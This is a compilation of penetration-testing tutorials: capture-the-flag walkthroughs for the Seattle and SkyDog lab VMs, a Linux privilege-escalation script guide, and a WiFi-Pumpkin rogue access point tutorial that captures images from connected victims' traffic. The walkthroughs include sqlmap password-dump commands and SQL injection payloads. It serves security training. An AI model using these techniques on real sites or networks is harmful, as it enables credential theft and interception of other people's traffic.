Hack the Seattle VM (CTF Challenge)

This is another article in the Boot2Root series of CTF challenges. This lab was prepared by HollyGracefull. It is a preview of the original lab, which simulates an e-commerce web application containing common security flaws. The vulnerabilities currently present are listed below:

·         SQL Injection (Error-based)
·         SQL Injection (Blind)
·         Reflected Cross-Site Scripting
·         Stored Cross-Site Scripting
·         Insecure Direct-Object Reference
·         Username Enumeration
·         Path Traversal
·         Exposed phpinfo()
·         Exposed Administrative Interface
·         Weak Admin Credentials

WalkThrough

Firstly, let’s locate our target.



Our target is 192.168.1.8. Let's scan it with nmap:

nmap -p- -A 192.168.1.8



The only port we found open was 80. Next we run nikto against the web server:

nikto -h 192.168.1.8


Through nikto we discovered two directories: /admin/ and /images/. We made a mental note of them and moved on to opening the target in a browser.


Opening it in the browser we found an e-commerce site, as the author hinted. We checked every tab but found nothing of interest except in the Blog tab.


In the Blog tab, hover the mouse over the word "Admin" in the phrase "Hey Admin!". The cursor changes from an arrow to a hand, which indicates that the word is a link.


Clicking it reveals the username admin. Make a note of it. Let's now check the Clothing tab.


There is nothing useful in this tab. As the author hinted that the website is vulnerable to SQL injection, let's try one. Rather than injecting by hand, this time we will hand a captured request to sqlmap: intercept a request to the site with Burp Suite.


Copy the raw intercepted request (including its Cookie header) from Burp Suite and paste it into a plain text file.


Then start the SQL injection attack by typing the following command in a Kali terminal:

sqlmap -r /root/Desktop/sea.txt --dbs

Here, /root/Desktop/sea.txt is the path of the text file in which we saved the captured request. The -r option makes sqlmap read the target URL, cookies and parameters from that file instead of the command line, and --dbs asks it to enumerate the databases.


This command gives us the names of the databases on the server.


Of these databases we will list the tables of seattle with the following command:

sqlmap -r /root/Desktop/sea.txt -D seattle --tables


And with that we have the names of all the tables, as you can see in the following image.


Next we will list the columns of the tblMembers table with the following command:

sqlmap -r /root/Desktop/sea.txt -D seattle -T tblMembers --columns


The above command lists the columns of tblMembers as follows:


Among the columns there is one named password. We already have the admin username, so the password is all we need; dump the contents of the password column with:

sqlmap -r /root/Desktop/sea.txt -D seattle -T tblmembers -C password --dump


And voila! We have the password: Assasin1
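The injection sqlmap automated above is worth seeing by hand. The following added example (not part of the original article or the lab) builds an in-memory SQLite stand-in for the seattle database with the table and column names sqlmap reported, and assumes the lab's login query concatenates user input into the SQL string (the table contents and the exact query shape are assumptions). It sends the three probes a tester would try in order: a lone quote to trigger the database error that error-based injection depends on, a tautology that logs in as admin without the password, and a UNION that reads the password column directly. The same probes against a parameterised query return nothing.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the lab's 'seattle' database.
    Table and column names mirror what sqlmap reported above; the rows are
    sample data for this example only."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblMembers (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO tblMembers (username, password) VALUES (?, ?)",
        [("admin", "Assasin1"), ("alice", "Winter2016")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation (the injectable pattern,
    assumed to match the lab's login). Returns ('rows', [...]) on success or
    ('error', message) when the database rejects the statement, which is the
    signal that error-based injection keys on."""
    sql = (
        "SELECT username FROM tblMembers "
        f"WHERE username='{username}' AND password='{password}'"
    )
    try:
        return ("rows", [row[0] for row in conn.execute(sql)])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def login_safe(conn, username, password):
    """The same query with bound parameters: user input can never change the
    statement's structure, so every probe below simply fails to log in."""
    sql = "SELECT username FROM tblMembers WHERE username=? AND password=?"
    rows = conn.execute(sql, (username, password))
    return ("rows", [row[0] for row in rows])


# Probes in the order a tester (or sqlmap) would send them.
PROBE_ERROR = "'"                                          # breaks the quoting -> DB error
PROBE_BYPASS = "admin' OR '1'='1"                          # tautology -> logged in as admin
PROBE_DUMP = "x' UNION SELECT password FROM tblMembers--"  # reads the password column


if __name__ == "__main__":
    db = build_db()
    for probe in (PROBE_ERROR, PROBE_BYPASS, PROBE_DUMP):
        print(f"{probe!r:52} vulnerable = {login_vulnerable(db, probe, 'x')}")
        print(f"{'':52} safe       = {login_safe(db, probe, 'x')}")
```

The UNION probe is the manual version of what --dump did: the trailing `--` comments out the rest of the original statement, so the password column is returned in place of the username. The error probe is what makes the "Error-based" entry in the vulnerability list exploitable; a site that returns the raw database error leaks enough for sqlmap to extract data one query at a time.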


Now, in the browser, go to the My Account tab, where you will find a login form. Enter the admin username and password and click Login.


And you will be logged in as the admin.


This CTF does not contain a flag. All that was required was admin access, and we have it.

4 Ways to get Linux Privilege Escalation

When you exploit a victim machine, the shell you obtain usually runs as a low-privileged user, so some actions are still blocked even though you have code execution. To get complete control you need privilege escalation: obtaining privileges the current user is not authorised to have, which can then be used to delete files, read private information or install unwanted programs such as malware. Metasploit has various post-exploitation modules that use a number of different techniques to attempt to gain root on the remote system. Apart from those, there are several Linux scripts that come in useful when trying to escalate privileges on a target. They are generally aimed at enumeration rather than at specific vulnerabilities or exploits, and can save you a lot of time.

Use a Linux payload and start multi/handler to receive the reverse connection. Once you have a shell on the victim, go for privilege escalation using the following scripts.

LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks. A shell script that enumerates the system configuration. A high-level summary of the checks and tasks LinEnum performs:

Privileged access: whether the current user has sudo access without a password; whether root's home directory is accessible.

System information: hostname, networking details, current IP, etc.

User information: current user; a list of all users with uid/gid information; a list of root accounts; whether password hashes are stored in /etc/passwd.

Kernel and distribution release details.


git clone https://github.com/rebootuser/LinEnum.git


Once you have downloaded the script, make it executable and run it by typing ./LinEnum.sh in the terminal. It dumps all the fetched data and system details.

./LinEnum.sh


Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the compromised system. To download the script, use the link http://www.securitysift.com/download/linuxprivchecker.py

To use the script, type python linuxprivchecker.py in the terminal. It enumerates file and directory permissions and contents, and otherwise works much like LinEnum, gathering system, network and user details.

python linuxprivchecker.py


Linux Exploit Suggester

This one works from the operating system release number. The program runs 'uname -r' to obtain the kernel release and returns a list of exploits that may apply to it. The '-k' flag lets you enter a kernel version manually instead. It is a Perl script and, unlike the two scripts above, it suggests exploits rather than enumerating the system. Type the following to download it:

git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git


If you already know the kernel version, execute the script directly by typing the following in the terminal:
./Linux_Exploit_Suggester.pl -k 3.5

If not, run uname -r on the target to find its kernel version, then use the command above with your own kernel version in place of mine. The script then suggests possible exploits for privilege escalation.


Unix-Privesc-checker

A shell script to check privilege escalation vectors on UNIX systems. Unix-privesc-check runs on UNIX and Linux systems and looks for misconfigurations that could allow an unauthorised user to escalate privileges to other users or to access local applications.

It is written as a single shell script so it can be easily uploaded and executed. It can be run either as a normal user or as root. When it finds a group-writable file or directory it only flags an issue if that group has more than one non-root member.

Download the script, unzip the folder and execute it by typing the following:

unix-privesc-check standard


You can also see how I use these scripts in the images, which may help you follow along. For a more thorough run, use the detailed mode:
unix-privesc-check detailed
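To make clear what these scripts actually test, here is an added example (my own code, not taken from LinEnum, linuxprivchecker or unix-privesc-check) that implements a few of the checks described above in Python: hashes stored directly in /etc/passwd and extra uid-0 accounts (LinEnum's user checks), parsing the kernel release into the version tuple an exploit suggester matches on, finding SUID binaries, and unix-privesc-check's rule that a group-writable file only matters when the group has more than one non-root member. The /etc/passwd and /etc/group contents are constructed samples embedded in the block; only find_suid and sudo_without_password touch the live system.

```python
import os
import re
import stat
import subprocess

# Constructed sample of /etc/passwd: 'legacy' keeps a real hash in the
# password field instead of the usual 'x' that points at /etc/shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$1$abcd$XXXXXXXXXXXXXXXXXXXXXX:1001:1001::/home/legacy:/bin/sh
guest:*:1002:1002::/home/guest:/bin/sh
"""

# Constructed sample of /etc/group (supplementary members only).
SAMPLE_GROUP = """\
root:x:0:
staff:x:50:alice,bob
dev:x:1003:alice
"""


def hashes_in_passwd(passwd_text):
    """Usernames whose password field holds an actual hash. 'x' means the hash
    lives in /etc/shadow; '*', '!' or an empty field mean locked/no password."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[1] not in ("x", "*", "!", ""):
            found.append(fields[0])
    return found


def root_accounts(passwd_text):
    """Every account with uid 0; anything besides 'root' is worth a look."""
    rows = (line.split(":") for line in passwd_text.splitlines())
    return [f[0] for f in rows if len(f) >= 3 and f[2] == "0"]


def kernel_release(uname_r):
    """'4.4.0-31-generic' -> (4, 4, 0): the tuple exploit suggesters compare."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r.strip())
    if not m:
        raise ValueError("unrecognised kernel release: %r" % uname_r)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_suid_mode(mode):
    """True for a regular file with the set-uid bit (as reported by stat)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin")):
    """Walk the given directories on the live system and list SUID binaries."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if is_suid_mode(st.st_mode):
                    hits.append(path)
    return hits


def group_writable_is_risky(mode, gid, group_text):
    """unix-privesc-check's rule: a group-writable file or directory is only
    flagged when its group has more than one non-root member. Simplification:
    only supplementary members listed in /etc/group are counted."""
    if not mode & stat.S_IWGRP:
        return False
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[2] == str(gid):
            members = [m for m in fields[3].split(",") if m and m != "root"]
            return len(members) > 1
    return False


def sudo_without_password():
    """True when 'sudo -n true' succeeds, i.e. the user has passwordless sudo
    (-n makes sudo fail instead of prompting, so this never hangs)."""
    try:
        result = subprocess.run(["sudo", "-n", "true"], capture_output=True, timeout=5)
        return result.returncode == 0
    except (OSError, subprocess.TimeoutExpired):
        return False


if __name__ == "__main__":
    print("hashes in passwd:", hashes_in_passwd(SAMPLE_PASSWD))
    print("uid-0 accounts:", root_accounts(SAMPLE_PASSWD))
    print("kernel:", kernel_release(os.uname().release))
    print("suid binaries:", find_suid()[:10])
    print("passwordless sudo:", sudo_without_password())
```

Replace the sample strings with the real files (open("/etc/passwd").read()) to run the parsing checks on a target; the point of keeping them as pure functions is that the findings can be reviewed, and the logic tested, without running anything as root.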

Capture Images from a Victim's Mobile using Driftnet through WiFi Pumpkin

WiFi-Pumpkin is an open source security tool that provides a rogue access point for man-in-the-middle and other network attacks. Using WiFi-Pumpkin, one can create a Wi-Fi network that captures all the requests made by any device that connects to it.

First of all you need to download WiFi-Pumpkin and install it on your Kali Linux. To download it, go to https://github.com/P0cL4bs/WiFi-Pumpkin, click on Clone or Download and copy the repository URL. Then open a terminal and type:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

Next, change into the WiFi-Pumpkin directory in the terminal and run the installer. For example, if the repository was cloned to the Desktop, type:

cd Desktop/WiFi-Pumpkin
./installer.sh --install

Thereafter, run wifi-pumpkin:


This opens the WiFi-Pumpkin GUI. Select the wireless adapter and change the SSID from the default PumpAP to whatever name you want.


Then click the Start button. This brings up a new access point with the SSID you entered.


As soon as any device connects to this network, its details appear in the table on the right. Select a target from the list of connected devices and select Active Driftnet from the Tools menu.


Once Driftnet starts, it reconstructs and displays the images that pass through the access point in the victim's unencrypted HTTP traffic, whether from a desktop or a mobile device. Note that Driftnet only sees cleartext: anything loaded over HTTPS, which includes Facebook and most major sites today, is encrypted end to end and will not show up.


Hack the SkyDog Con CTF 2016 - Catch Me If You Can VM


SkyDog is the second VM in the CTF series created by James Brower. It is configured for DHCP, so it is given an IP address automatically. The VM is themed on Catch Me If You Can, the film about the con man Frank Abagnale, so it is fair to assume that a good deal of OSINT will be involved. It is a great VM because it exercises both hacking and forensic skills. The author has given us hints for all eight flags, as below:

Flag #1 : Don't go Home Frank! There's a Hex on Your House
Flag #2 : Obscurity or Security?
Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
Flag #4 : A Good Agent is Hard to Find.
Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
Flag #6 :  Where in the World is Frank?
Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!
Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Besides this, we know that the flags are MD5 hashes. You can download the VM from: https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

Penetrating Methodology
§  Network scanning (Netdiscover, Nmap)
§  Examine the source code of the web page
§  Extract and decode the hex value for the 1st flag
§  Connect to SSH for the 2nd flag
§  Inspect the HTTPS certificate for the 3rd flag
§  Intercept the browser request and change the User-Agent (Burp Suite)
§  Obtain the 4th flag and follow its clue
§  Explore the FBI workstation page and its evidence.txt file
§  Decode the 5th flag to obtain a credential
§  Download the image after logging in
§  Extract the hidden file from the image (steghide)
§  Open flag.txt and capture the 6th flag along with a password
§  Log in over SSH and capture the 7th flag
§  Download the zip file via SCP and unzip it
§  Forensic trick: extract the 8th flag from the memory image (Volatility)


WalkThrough

Let us find our target first by using the following command in the Kali terminal:

netdiscover

We can clearly see that our target IP is 192.168.1.100. Now that we have identified the target, let's scan it with nmap:
nmap -p- -sV 192.168.1.100
Nmap shows port 22 closed and ports 80, 443 and 22222 open, running HTTP, HTTPS and SSH respectively. The SSH daemon has been moved from its default port 22 to 22222, which is why 22 shows as closed. That is no real security control, only an attempt to throw off attackers who scan default ports (the hint for flag #2, "Obscurity or Security?", fits this).
As port 80 is open, along with 443, we can open the IP in a browser.
The home page gives us nothing to go on, so we check its page source.

In the page source you will find a directory. Let's open it and see what it holds.

The directory did not have much to go on either, so we viewed its page source as well, and there we found a hex value. From the author's first hint, Flag #1: Don't go Home Frank! There's a Hex on Your House, we can tell that this hex is our first flag. Let's decode it with the following command in the Kali terminal, pasting the hex string from the page source in place of the placeholder:
echo <hex value> | xxd -p -r
Here,
xxd : creates a hex dump (or, with -r, reverses one)
-p : treats the input as a plain hex string with no offsets or ASCII column
-r : reverse mode, converting hex back into bytes

The command turns the hex back into text, as you can see in the image above. The result is an MD5 hash; MD5 cannot be reversed, so we look it up against likely plaintexts, and the flag turns out to be nmap. That means our next hint is nmap, and that is where we should look.
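Every flag in this VM follows the same two steps: a value is hex-encoded or otherwise hidden, and once recovered it is an MD5 hash that has to be matched against a guess. The following added example (my own code, not part of the original walkthrough) does both steps in Python: hex_to_text is the xxd -p -r step, and crack_md5 does what "de-hashing" actually means here, hashing each candidate word and comparing. The candidate list is built from the hints and answers in this walkthrough; the sample hex in the demo is constructed from md5("nmap") rather than copied from the VM.

```python
import hashlib

# Candidate plaintexts drawn from the hints and answers in this walkthrough.
# MD5 is one-way: "de-hashing" a flag means hashing guesses until one matches.
CANDIDATES = [
    "nmap", "encrypt", "personnel", "evidence", "panam",
    "ILoveFrance", "theflash", "iheartbrenda",
]


def hex_to_text(hex_string):
    """The xxd -p -r step: '6e6d6170' -> 'nmap'. Whitespace and newlines are
    ignored so a value copied out of page source with line breaks still works."""
    return bytes.fromhex("".join(hex_string.split())).decode("utf-8")


def md5_hex(text):
    """Lower-case hex MD5 of a string, the form the flags on this VM use."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack_md5(digest, candidates=CANDIDATES):
    """Return the candidate whose MD5 equals digest, or None if none match.
    Rejects anything that is not a 32-character hex digest up front, which
    catches the common mistake of passing the still-hex-encoded value."""
    digest = digest.strip().lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not an MD5 hex digest: %r" % digest)
    for word in candidates:
        if md5_hex(word) == digest:
            return word
    return None


def decode_flag(hex_string, candidates=CANDIDATES):
    """Full pipeline for flag #1: hex-decode the value from the page source,
    then look the resulting MD5 up against the candidate list."""
    return crack_md5(hex_to_text(hex_string), candidates)


if __name__ == "__main__":
    # Constructed demo input: the hex encoding of md5("nmap").
    sample = md5_hex("nmap").encode("utf-8").hex()
    print(sample, "->", hex_to_text(sample), "->", decode_flag(sample))
```

To use it on a real flag, pass the hex string from the page source to decode_flag, or the hash from the SSH banner or certificate straight to crack_md5; swap CANDIDATES for a wordlist (one word per line) when the hint does not narrow the guess down.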

As noted earlier, SSH has been hidden on a non-default port, so let's poke it by typing the following command:
ssh 192.168.1.100 -p22222

The connection attempt presents our next flag; looking up the hash, it turns out to be encrypt.

Our next flag should therefore be somewhere in the encryption the site uses. The obvious place is the TLS certificate served on port 443. Let's check it.

Click on the highlighted area shown in the picture above. The following dialogue box opens.

Click on the Security tab as shown in the image above, then click the View Certificate button. In the certificate you will find the third flag, as shown below:

Looked up, this flag turns out to be personnel.
I assumed personnel would be a directory, so let's open it in the browser.

As shown, the page says "you do not appear to be from an FBI workstation", which means there is an FBI workstation somewhere. I looked back through every page source we had seen and found that the FBI workstation is identified by Internet Explorer 4.


Now, reload the personnel directory with Burp Suite intercepting the request, which lets you edit the request before it reaches the server and so pretend to be a different browser.

In the intercepted request, change the User-Agent header from the browser's own value (containing "linux x86_64") to "MSIE 4.0", as shown in the images.

Once you forward the request from Burp Suite, the personnel page loads. There you will find your next flag together with a hint: we have to add the prefix "new" to whatever the flag is once the hash is resolved.

The flag resolves to evidence, so adding the prefix gives us newevidence.

The directory /newevidence takes us to an FBI login portal.

We have no username or password and no clue about them either, so I explored the page source.

In the page source we found a reference to evidence.txt. Opening evidence.txt gave us our next flag.

Resolved, the flag is panam.
Now let's open newevidence, which we found with the previous flag.

It shows us an image. There must be a message hidden steganographically in the image, so use the following command to extract it (steghide prompts for a passphrase; press Enter if none is needed):
steghide extract -sf newevidence.jpeg

The hidden file was flag.txt. To read the flag, type:
cat flag.txt
Resolving the hash gives us ILoveFrance, and we also have a clue: iheartbrenda. Both the flag and the clue are important, so make a note of them.


For our seventh flag we have the hint: Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I'm The Fastest Man Alive! "I am the fastest man alive" is the introductory line of The Flash, and in the film Frank uses the alias Barry Allen, the Flash's real name.
Therefore barryallen could be our username. Let's log in over SSH on port 22222 with the username barryallen. When asked for a password I tried both ILoveFrance and iheartbrenda, and iheartbrenda was the correct one.


Once logged in, we used the following commands to find our flag:
ls : to list all the files
cat flag.txt : to read the flag
And so we have our next flag. Resolving the hash gives theflash.

As we have both the username and password for SSH, we can use scp. SCP (the scp command) securely copies files and directories to and from a remote host over SSH without starting an FTP session or logging into the remote system interactively. Note that scp uses a capital -P for the port:

scp -P 22222 barryallen@192.168.1.100:/home/barryallen/security-system.data /root/Desktop/file
Once you have the file, unzip it by typing:
unzip file
The result is a Windows memory image, and the following command completes the challenge by pulling the text of any open Notepad window out of it:
volatility -f security-system.data notepad
If Volatility cannot identify the image on its own, run volatility -f security-system.data imageinfo first and pass the suggested --profile to the notepad plugin.

YAY! Once again, we have completed a CTF challenge successfully.